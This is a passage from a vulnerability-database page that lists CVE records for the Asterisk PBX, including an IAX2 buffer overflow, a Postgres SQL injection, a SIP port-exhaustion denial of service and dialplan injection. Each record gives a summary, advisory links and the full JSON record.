        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "A090403-1",
              "refsource": "ATSTAKE",
              "url": "http://www.atstake.com/research/advisories/2003/a090403-1.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0761",
    "datePublished": "2003-09-12T04:00:00Z",
    "dateReserved": "2003-09-05T00:00:00Z",
    "dateUpdated": "2024-09-17T03:23:08.374Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-2898

Vulnerability from cvelistv5

Published

2006-06-07 10:00

Modified

2024-08-07 18:06

Severity ?

Summary

The IAX2 channel driver (chan_iax2) for Asterisk 1.2.x before 1.2.9 and 1.0.x before 1.0.11 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via truncated IAX 2 (IAX2) video frames, which bypasses a length check and leads to a buffer overflow involving negative length check. NOTE: the vendor advisory claims that only a DoS is possible, but the original researcher is reliable.

References

▼	URL	Tags
	http://securitytracker.com/id?1016236	vdb-entry, x_refsource_SECTRACK
	http://www.debian.org/security/2006/dsa-1126	vendor-advisory, x_refsource_DEBIAN
	http://secunia.com/advisories/20899	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/20658	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/27045	vdb-entry, x_refsource_XF
	http://secunia.com/advisories/21222	third-party-advisory, x_refsource_SECUNIA
	http://www.asterisk.org/node/95	x_refsource_CONFIRM
	http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml	vendor-advisory, x_refsource_GENTOO
	http://www.securityfocus.com/bid/18295	vdb-entry, x_refsource_BID
	http://secunia.com/advisories/20497	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/archive/1/436127/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.vupen.com/english/advisories/2006/2181	vdb-entry, x_refsource_VUPEN
	http://www.novell.com/linux/security/advisories/2006_38_security.html	vendor-advisory, x_refsource_SUSE
	http://www.securityfocus.com/archive/1/436671/100/0/threaded	mailing-list, x_refsource_BUGTRAQ

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T18:06:27.038Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1016236",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016236"
          },
          {
            "name": "DSA-1126",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2006/dsa-1126"
          },
          {
            "name": "20899",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20899"
          },
          {
            "name": "20658",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20658"
          },
          {
            "name": "asterisk-iax2-videoframe-bo(27045)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27045"
          },
          {
            "name": "21222",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/21222"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.asterisk.org/node/95"
          },
          {
            "name": "GLSA-200606-15",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml"
          },
          {
            "name": "18295",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/18295"
          },
          {
            "name": "20497",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20497"
          },
          {
            "name": "20060606 Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/436127/100/0/threaded"
          },
          {
            "name": "ADV-2006-2181",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/2181"
          },
          {
            "name": "SUSE-SR:2006:015",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://www.novell.com/linux/security/advisories/2006_38_security.html"
          },
          {
            "name": "20060609 CORE-2006-0330: Asterisk PBX truncated video frame vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/436671/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-06-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The IAX2 channel driver (chan_iax2) for Asterisk 1.2.x before 1.2.9 and 1.0.x before 1.0.11 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via truncated IAX 2 (IAX2) video frames, which bypasses a length check and leads to a buffer overflow involving negative length check.  NOTE: the vendor advisory claims that only a DoS is possible, but the original researcher is reliable."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1016236",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016236"
        },
        {
          "name": "DSA-1126",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2006/dsa-1126"
        },
        {
          "name": "20899",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20899"
        },
        {
          "name": "20658",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20658"
        },
        {
          "name": "asterisk-iax2-videoframe-bo(27045)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27045"
        },
        {
          "name": "21222",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/21222"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/95"
        },
        {
          "name": "GLSA-200606-15",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml"
        },
        {
          "name": "18295",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/18295"
        },
        {
          "name": "20497",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20497"
        },
        {
          "name": "20060606 Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/436127/100/0/threaded"
        },
        {
          "name": "ADV-2006-2181",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/2181"
        },
        {
          "name": "SUSE-SR:2006:015",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://www.novell.com/linux/security/advisories/2006_38_security.html"
        },
        {
          "name": "20060609 CORE-2006-0330: Asterisk PBX truncated video frame vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/436671/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-2898",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The IAX2 channel driver (chan_iax2) for Asterisk 1.2.x before 1.2.9 and 1.0.x before 1.0.11 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via truncated IAX 2 (IAX2) video frames, which bypasses a length check and leads to a buffer overflow involving negative length check.  NOTE: the vendor advisory claims that only a DoS is possible, but the original researcher is reliable."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1016236",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016236"
            },
            {
              "name": "DSA-1126",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2006/dsa-1126"
            },
            {
              "name": "20899",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20899"
            },
            {
              "name": "20658",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20658"
            },
            {
              "name": "asterisk-iax2-videoframe-bo(27045)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27045"
            },
            {
              "name": "21222",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/21222"
            },
            {
              "name": "http://www.asterisk.org/node/95",
              "refsource": "CONFIRM",
              "url": "http://www.asterisk.org/node/95"
            },
            {
              "name": "GLSA-200606-15",
              "refsource": "GENTOO",
              "url": "http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml"
            },
            {
              "name": "18295",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/18295"
            },
            {
              "name": "20497",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20497"
            },
            {
              "name": "20060606 Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/436127/100/0/threaded"
            },
            {
              "name": "ADV-2006-2181",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/2181"
            },
            {
              "name": "SUSE-SR:2006:015",
              "refsource": "SUSE",
              "url": "http://www.novell.com/linux/security/advisories/2006_38_security.html"
            },
            {
              "name": "20060609 CORE-2006-0330: Asterisk PBX truncated video frame vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/436671/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-2898",
    "datePublished": "2006-06-07T10:00:00",
    "dateReserved": "2006-06-07T00:00:00",
    "dateUpdated": "2024-08-07T18:06:27.038Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-6171

Vulnerability from cvelistv5

Published

2007-11-30 01:00

Modified

2024-08-07 15:54

Severity ?

Summary

SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors.

References

▼	URL	Tags
	http://osvdb.org/38933	vdb-entry, x_refsource_OSVDB
	http://securitytracker.com/id?1019021	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/archive/1/484387/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.vupen.com/english/advisories/2007/4055	vdb-entry, x_refsource_VUPEN
	http://downloads.digium.com/pub/security/AST-2007-025.html	x_refsource_CONFIRM
	http://secunia.com/advisories/27873	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/bid/26645	vdb-entry, x_refsource_BID
	https://exchange.xforce.ibmcloud.com/vulnerabilities/38766	vdb-entry, x_refsource_XF

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:54:26.995Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "38933",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38933"
          },
          {
            "name": "1019021",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1019021"
          },
          {
            "name": "20071129 AST-2007-025 - SQL Injection issue in res_config_pgsql",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/484387/100/0/threaded"
          },
          {
            "name": "ADV-2007-4055",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/4055"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2007-025.html"
          },
          {
            "name": "27873",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/27873"
          },
          {
            "name": "26645",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/26645"
          },
          {
            "name": "asterisk-resconfigpgsql-sql-injection(38766)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38766"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-11-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-15T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "38933",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38933"
        },
        {
          "name": "1019021",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1019021"
        },
        {
          "name": "20071129 AST-2007-025 - SQL Injection issue in res_config_pgsql",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/484387/100/0/threaded"
        },
        {
          "name": "ADV-2007-4055",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/4055"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2007-025.html"
        },
        {
          "name": "27873",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/27873"
        },
        {
          "name": "26645",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/26645"
        },
        {
          "name": "asterisk-resconfigpgsql-sql-injection(38766)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38766"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-6171",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "38933",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38933"
            },
            {
              "name": "1019021",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1019021"
            },
            {
              "name": "20071129 AST-2007-025 - SQL Injection issue in res_config_pgsql",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/484387/100/0/threaded"
            },
            {
              "name": "ADV-2007-4055",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/4055"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2007-025.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2007-025.html"
            },
            {
              "name": "27873",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/27873"
            },
            {
              "name": "26645",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/26645"
            },
            {
              "name": "asterisk-resconfigpgsql-sql-injection(38766)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38766"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-6171",
    "datePublished": "2007-11-30T01:00:00",
    "dateReserved": "2007-11-29T00:00:00",
    "dateUpdated": "2024-08-07T15:54:26.995Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-7551

Vulnerability from cvelistv5

Published

2017-04-17 16:00

Modified

2024-08-06 02:04

Severity ?

Summary

chain_sip in Asterisk Open Source 11.x before 11.23.1 and 13.x 13.11.1 and Certified Asterisk 11.6 before 11.6-cert15 and 13.8 before 13.8-cert3 allows remote attackers to cause a denial of service (port exhaustion).

References

▼	URL	Tags
	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-26272	x_refsource_MISC
	https://bugzilla.redhat.com/show_bug.cgi?id=1374733	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2016-007.html	x_refsource_CONFIRM
	http://www.debian.org/security/2016/dsa-3700	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T02:04:55.787Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26272"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-007.html"
          },
          {
            "name": "DSA-3700",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3700"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-08-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chain_sip in Asterisk Open Source 11.x before 11.23.1 and 13.x 13.11.1 and Certified Asterisk 11.6 before 11.6-cert15 and 13.8 before 13.8-cert3 allows remote attackers to cause a denial of service (port exhaustion)."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-04-17T15:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26272"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-007.html"
        },
        {
          "name": "DSA-3700",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3700"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-7551",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chain_sip in Asterisk Open Source 11.x before 11.23.1 and 13.x 13.11.1 and Certified Asterisk 11.6 before 11.6-cert15 and 13.8 before 13.8-cert3 allows remote attackers to cause a denial of service (port exhaustion)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832",
              "refsource": "MISC",
              "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-26272",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26272"
            },
            {
              "name": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733",
              "refsource": "CONFIRM",
              "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-007.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-007.html"
            },
            {
              "name": "DSA-3700",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3700"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-7551",
    "datePublished": "2017-04-17T16:00:00",
    "dateReserved": "2016-09-09T00:00:00",
    "dateUpdated": "2024-08-06T02:04:55.787Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2010-0685

Vulnerability from cvelistv5

Published

2010-02-23 20:00

Modified

2024-08-07 00:59

Severity ?

Summary

The design of the dialplan functionality in Asterisk Open Source 1.2.x, 1.4.x, and 1.6.x; and Asterisk Business Edition B.x.x and C.x.x, when using the ${EXTEN} channel variable and wildcard pattern matches, allows context-dependent attackers to inject strings into the dialplan using metacharacters that are injected when the variable is expanded, as demonstrated using the Dial application to process a crafted SIP INVITE message that adds an unintended outgoing channel leg. NOTE: it could be argued that this is not a vulnerability in Asterisk, but a class of vulnerabilities that can occur in any program that uses this feature without the associated filtering functionality that is already available.

References

▼	URL	Tags
	http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt	x_refsource_MISC
	http://secunia.com/advisories/39096	third-party-advisory, x_refsource_SECUNIA
	http://www.securitytracker.com/id?1023637	vdb-entry, x_refsource_SECTRACK
	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html	vendor-advisory, x_refsource_FEDORA
	http://www.securityfocus.com/archive/1/509608/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://secunia.com/advisories/38641	third-party-advisory, x_refsource_SECUNIA
	http://downloads.digium.com/pub/security/AST-2010-002.html	x_refsource_CONFIRM
	http://www.vupen.com/english/advisories/2010/0439	vdb-entry, x_refsource_VUPEN
	https://exchange.xforce.ibmcloud.com/vulnerabilities/56397	vdb-entry, x_refsource_XF

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:59:38.329Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt"
          },
          {
            "name": "39096",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/39096"
          },
          {
            "name": "1023637",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1023637"
          },
          {
            "name": "FEDORA-2010-3724",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
          },
          {
            "name": "20100218 AST-2010-002: Dialplan injection vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/509608/100/0/threaded"
          },
          {
            "name": "38641",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/38641"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2010-002.html"
          },
          {
            "name": "ADV-2010-0439",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2010/0439"
          },
          {
            "name": "asterisk-dial-weak-security(56397)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56397"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2010-02-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The design of the dialplan functionality in Asterisk Open Source 1.2.x, 1.4.x, and 1.6.x; and Asterisk Business Edition B.x.x and C.x.x, when using the ${EXTEN} channel variable and wildcard pattern matches, allows context-dependent attackers to inject strings into the dialplan using metacharacters that are injected when the variable is expanded, as demonstrated using the Dial application to process a crafted SIP INVITE message that adds an unintended outgoing channel leg.  NOTE: it could be argued that this is not a vulnerability in Asterisk, but a class of vulnerabilities that can occur in any program that uses this feature without the associated filtering functionality that is already available."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
